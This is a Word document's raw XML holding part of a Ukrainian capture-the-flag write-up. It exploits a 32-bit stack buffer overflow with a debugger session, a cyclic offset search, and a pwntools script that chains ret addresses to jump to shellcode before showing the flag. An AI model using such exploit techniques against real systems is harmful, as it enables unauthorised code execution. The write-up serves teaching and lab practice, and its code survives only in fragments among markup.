    <w:p w14:paraId="4CB7BE85" w14:textId="3572A069" w:rsidR="00734B87" w:rsidRPr="003361D6" w:rsidRDefault="00734B87" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Змінюємо значення </w:t>
      </w:r>
      <w:r w:rsidR="004352D6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ax</w:t>
      </w:r>
      <w:r w:rsidRPr="000355B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="000355B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1337 і продовжуємо виконання: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4014DC3E" w14:textId="18981723" w:rsidR="00734B87" w:rsidRPr="00734B87" w:rsidRDefault="00734B87" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA782B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>gef</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA782B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidR="00A04E88">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA782B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>set $</w:t>
      </w:r>
      <w:r w:rsidR="004352D6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA782B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ax=1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B520DE3" w14:textId="77777777" w:rsidR="00734B87" w:rsidRDefault="00734B87" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D005F6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>gef</w:t>
      </w:r>
      <w:r w:rsidRPr="00D005F6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00D005F6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EBB5BA" w14:textId="765E23AE" w:rsidR="00734B87" w:rsidRDefault="008417D4" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Четвертий</w:t>
      </w:r>
      <w:r w:rsidR="00734B87">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> брейкпоінт. Бачимо, що </w:t>
      </w:r>
      <w:r w:rsidR="00734B87">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="009D46C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cx</w:t>
      </w:r>
      <w:r w:rsidR="00734B87" w:rsidRPr="007C061F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00734B87" w:rsidRPr="009D46C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00F823A4" w:rsidRPr="00F823A4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>zabt</w:t>
      </w:r>
      <w:r w:rsidR="00734B87" w:rsidRPr="009D46C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCFD0B5" w14:textId="77777777" w:rsidR="002B286C" w:rsidRDefault="002B286C" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF18B88" w14:textId="77777777" w:rsidR="002B286C" w:rsidRDefault="002B286C" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397A2FB3" w14:textId="50F288CC" w:rsidR="00F40F28" w:rsidRDefault="007C36C8" w:rsidP="00734B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76E7F5" wp14:editId="0A096E63">
            <wp:extent cx="6645910" cy="4615815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1255591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12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CD7" w14:textId="77777777" w:rsidR="00C414E3" w:rsidRDefault="00C414E3" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28542BE9" w14:textId="758D4CAB" w:rsidR="00F6476B" w:rsidRPr="00463CB6" w:rsidRDefault="00F6476B" w:rsidP="00F6476B">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Знайдемо позицію байтів </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3AA3">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C94415">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>zabt</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3AA3">
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в послідовності:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7164B516" w14:textId="77777777" w:rsidR="00E54AAE" w:rsidRPr="00E54AAE" w:rsidRDefault="00E54AAE" w:rsidP="00E54AA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E54AA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E54AA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54AAE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yclic_find</w:t>
      </w:r>
      <w:r w:rsidRPr="00E54AA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E54AAE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zabt"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E54AAE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</w:p>
    <w:p w14:paraId="5725EFA8" w14:textId="77777777" w:rsidR="00D51C10" w:rsidRDefault="00D51C10" w:rsidP="00F6476B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7369949B" w14:textId="3D28893E" w:rsidR="00F6476B" w:rsidRPr="00A32D5F" w:rsidRDefault="00A879C2" w:rsidP="00F6476B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0617F582" wp14:editId="60322150">
            <wp:extent cx="3961905" cy="609524"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="2025554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43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FE96" w14:textId="68D9B5CB" w:rsidR="00F6476B" w:rsidRDefault="00F6476B" w:rsidP="00F6476B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Саме після </w:t>
      </w:r>
      <w:r w:rsidR="005F4DDF" w:rsidRPr="0058615B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4498</w:t>
      </w:r>
      <w:r w:rsidRPr="008A11CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>байтів повин</w:t>
      </w:r>
      <w:r w:rsidR="0058615B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">на йти адреса </w:t>
      </w:r>
      <w:r w:rsidR="0058615B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidR="0058615B" w:rsidRPr="0058615B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0058615B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ланцюжка</w:t>
      </w:r>
      <w:r w:rsidR="002F15F7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C502B" w14:textId="3C343B3D" w:rsidR="00E514F4" w:rsidRDefault="00E514F4" w:rsidP="00F6476B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E1D892" w14:textId="2C685CDC" w:rsidR="00E514F4" w:rsidRPr="00E06789" w:rsidRDefault="00E514F4" w:rsidP="00F6476B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Щоб дізнатися</w:t>
      </w:r>
      <w:r w:rsidR="005A1B2D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> як</w:t>
      </w:r>
      <w:r w:rsidR="00804844">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>саме адрес</w:t>
      </w:r>
      <w:r w:rsidR="00804844">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A020E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ми повинні використати, продебажимо ще раз</w:t>
      </w:r>
      <w:r w:rsidR="00A73989">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Тільки замість послідовності де Брейна</w:t>
      </w:r>
      <w:r w:rsidR="00722D5A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A73989">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F2336A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>переповнимо буфер</w:t>
      </w:r>
      <w:r w:rsidR="00722D5A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> з використанням</w:t>
      </w:r>
      <w:r w:rsidR="00722D5A" w:rsidRPr="00722D5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00722D5A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidR="00722D5A" w:rsidRPr="00722D5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00722D5A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ланцюжка</w:t>
      </w:r>
      <w:r w:rsidR="00F2336A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA9B08B" w14:textId="77777777" w:rsidR="0028071B" w:rsidRDefault="0028071B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uk-UA" w:eastAsia="ru-UA"/>
        </w:rPr>
      </w:pP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uffer overflow (with ret chain)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28071B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 xml:space="preserve">b"A"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28071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898  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eax before "cmp eax, 0x539"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28071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28071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337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buf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28071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et </w:t>
      </w:r>
      <w:r w:rsidRPr="0028071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* </w:t>
      </w:r>
      <w:r w:rsidRPr="0028071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200  </w:t>
      </w:r>
      <w:r w:rsidRPr="0028071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t chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4AFD00" w14:textId="1BF2C52F" w:rsid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09B78D11" w14:textId="77777777" w:rsid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1DC0B1EA" w14:textId="77777777" w:rsidR="00F27E0D" w:rsidRPr="00F27E0D" w:rsidRDefault="00F27E0D" w:rsidP="00F27E0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OP CHAIN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...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ROP CHAIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C57184A" w14:textId="77777777" w:rsid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715418DF" w14:textId="77777777" w:rsidR="00F27E0D" w:rsidRPr="00F27E0D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5715E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391DE623" w14:textId="1A26C082" w:rsidR="0028071B" w:rsidRPr="0028071B" w:rsidRDefault="00F27E0D" w:rsidP="0028071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rwx_addr)  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Jump to shellcode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uf.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just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27E0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4498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F27E0D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-UA" w:eastAsia="ru-UA"/>
        </w:rPr>
        <w:t>b"B"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ecx after "pop ecx"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buf += p32(0xffffd000)  # Address of the ret chain in the stack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t xml:space="preserve">buf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27E0D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dddddddd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nd_bad_bytes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buf)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UN PROCESS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buf = cyclic(5000)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F27E0D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F27E0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F27E0D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F27E0D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F27E0D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F27E0D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7D5630FA" w14:textId="77777777" w:rsidR="00F2336A" w:rsidRPr="008D72BB" w:rsidRDefault="00F2336A" w:rsidP="00F6476B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C915BF" w14:textId="295E9C10" w:rsidR="00F6476B" w:rsidRDefault="005715C5" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Дійдемо до 2 брейкпоінта і виведемо стек:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1CA73F" w14:textId="582C7A67" w:rsidR="005715C5" w:rsidRPr="005715C5" w:rsidRDefault="00D316B4" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D005F6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>gef</w:t>
      </w:r>
      <w:r w:rsidRPr="00D005F6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00D005F6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005715C5" w:rsidRPr="005715C5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x/5000wx $esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77247E6A" w14:textId="3525E4BE" w:rsidR="005715C5" w:rsidRPr="005715C5" w:rsidRDefault="005709C8" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09C528D0" wp14:editId="761CA7CA">
            <wp:extent cx="6645910" cy="1711325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="28804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2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632" w14:textId="0C07F26B" w:rsidR="00F40F28" w:rsidRPr="00297B32" w:rsidRDefault="004A33EB" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">За адресою </w:t>
      </w:r>
      <w:r w:rsidR="00BA6500" w:rsidRPr="004A33EB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0xfff</w:t>
      </w:r>
      <w:r w:rsidR="00784201">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fcfc</w:t>
      </w:r>
      <w:r w:rsidR="00784201" w:rsidRPr="00297B32">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00593339">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в стеку</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> бачимо лан</w:t>
      </w:r>
      <w:r w:rsidR="00F50E30">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ц</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">южок адрес </w:t>
      </w:r>
      <w:r w:rsidRPr="004A33EB">
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="004A33EB">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00297B32">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Можна обрати будь-яку адресу</w:t>
      </w:r>
      <w:r w:rsidR="00C352C5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> з середини</w:t>
      </w:r>
      <w:r w:rsidR="0055079F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00940F55">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidR="0055079F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00940F55">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">обрав </w:t>
      </w:r>
      <w:r w:rsidR="00297B32" w:rsidRPr="004A33EB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0xffffd000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AADE3E" w14:textId="77777777" w:rsidR="00734B87" w:rsidRDefault="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7391F679" w14:textId="77777777" w:rsidR="00894084" w:rsidRPr="00894084" w:rsidRDefault="00894084">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45751924" w14:textId="4F808423" w:rsidR="00DE5DF2" w:rsidRPr="001B02B5" w:rsidRDefault="00DE5DF2" w:rsidP="00DE5DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Отже, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">змінимо адресу з тестової </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5DF2">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xdddddddd</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5DF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на справжню</w:t>
      </w:r>
      <w:r w:rsidR="00165732" w:rsidRPr="00165732">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00165732" w:rsidRPr="004A33EB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0xffffd00</w:t>
      </w:r>
      <w:r w:rsidR="00EB5CF6" w:rsidRPr="00EB5CF6">
        <w:t>0.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB5CF6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Т</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>епер запустимо</w:t>
      </w:r>
      <w:r w:rsidRPr="001B02B5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>експлойт без дебагера</w:t>
      </w:r>
      <w:r w:rsidRPr="001B02B5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06810D4C" w14:textId="77777777" w:rsidR="001B02B5" w:rsidRPr="001B02B5" w:rsidRDefault="001B02B5" w:rsidP="001B02B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1B02B5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uf </w:t>
      </w:r>
      <w:r w:rsidRPr="001B02B5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= </w:t>
      </w:r>
      <w:r w:rsidRPr="001B02B5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32</w:t>
      </w:r>
      <w:r w:rsidRPr="001B02B5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1B02B5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xffffd000</w:t>
      </w:r>
      <w:r w:rsidRPr="001B02B5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 </w:t>
      </w:r>
      <w:r w:rsidRPr="001B02B5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Address of the ret chain in the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38525EA2" w14:textId="0DDB42AA" w:rsidR="00DE5DF2" w:rsidRPr="00A14282" w:rsidRDefault="00DE5DF2" w:rsidP="00DE5DF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un_locally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A1428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payload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A14282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bug </w:t>
      </w:r>
      <w:r w:rsidRPr="00A14282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A1428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A14282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4B053D8D" w14:textId="58AC484F" w:rsidR="00DE5DF2" w:rsidRPr="007C2B94" w:rsidRDefault="00DE5DF2" w:rsidP="00DE5DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2B94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 pwn_</w:t>
      </w:r>
      <w:r w:rsidR="009735AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2B94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231715C1" w14:textId="13BB7B36" w:rsidR="00DE5DF2" w:rsidRDefault="002A4320" w:rsidP="00DE5DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A727CF1" wp14:editId="575B5CEA">
            <wp:extent cx="6645910" cy="590550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1348124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24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42F" w14:textId="77777777" w:rsidR="00DE5DF2" w:rsidRPr="00B80DD1" w:rsidRDefault="00DE5DF2" w:rsidP="00DE5DF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Бачимо прапор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20920EB6" w14:textId="77777777" w:rsidR="00734B87" w:rsidRDefault="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A0DE492" w14:textId="77777777" w:rsidR="005347D9" w:rsidRDefault="005347D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DECC132" w14:textId="77777777" w:rsidR="00066AF2" w:rsidRPr="005347D9" w:rsidRDefault="00066AF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EA8B81" w14:textId="74446871" w:rsidR="00B36AEA" w:rsidRPr="00E876D6" w:rsidRDefault="00B36AEA" w:rsidP="00F305EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B36AEA" w:rsidRPr="00E876D6" w:rsidSect="00DC44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60D"/>
    <w:rsid w:val="000018C0"/>
    <w:rsid w:val="00001E9D"/>
    <w:rsid w:val="000022F7"/>
    <w:rsid w:val="00002494"/>
    <w:rsid w:val="00002CB1"/>
    <w:rsid w:val="00002FBA"/>
    <w:rsid w:val="000032EE"/>
    <w:rsid w:val="00003563"/>
    <w:rsid w:val="00003CFA"/>
    <w:rsid w:val="00004392"/>
    <w:rsid w:val="0000489E"/>
    <w:rsid w:val="00004E37"/>
    <w:rsid w:val="0000529E"/>
    <w:rsid w:val="0000530E"/>
    <w:rsid w:val="0000541C"/>
    <w:rsid w:val="00005C6A"/>
    <w:rsid w:val="00006244"/>
    <w:rsid w:val="0000758C"/>
    <w:rsid w:val="000077B9"/>
    <w:rsid w:val="00007ABE"/>
    <w:rsid w:val="000100C3"/>
    <w:rsid w:val="00010176"/>
    <w:rsid w:val="00010584"/>
    <w:rsid w:val="000106FD"/>
    <w:rsid w:val="00010B8A"/>
    <w:rsid w:val="000112AE"/>
    <w:rsid w:val="00011316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77C"/>
    <w:rsid w:val="00016B61"/>
    <w:rsid w:val="000177DA"/>
    <w:rsid w:val="00017944"/>
    <w:rsid w:val="000179EB"/>
    <w:rsid w:val="00020007"/>
    <w:rsid w:val="000205E4"/>
    <w:rsid w:val="00020654"/>
    <w:rsid w:val="00020E9D"/>
    <w:rsid w:val="0002198F"/>
    <w:rsid w:val="000223D1"/>
    <w:rsid w:val="00022568"/>
    <w:rsid w:val="000226B6"/>
    <w:rsid w:val="0002274E"/>
    <w:rsid w:val="000229B7"/>
    <w:rsid w:val="00023EBE"/>
    <w:rsid w:val="00024748"/>
    <w:rsid w:val="00025D53"/>
    <w:rsid w:val="00025EC9"/>
    <w:rsid w:val="0002621B"/>
    <w:rsid w:val="000263DE"/>
    <w:rsid w:val="000264D1"/>
    <w:rsid w:val="000272B3"/>
    <w:rsid w:val="000275D2"/>
    <w:rsid w:val="00027ADD"/>
    <w:rsid w:val="00027B02"/>
    <w:rsid w:val="000313A2"/>
    <w:rsid w:val="0003149B"/>
    <w:rsid w:val="000314A5"/>
    <w:rsid w:val="000317FD"/>
    <w:rsid w:val="00031ACE"/>
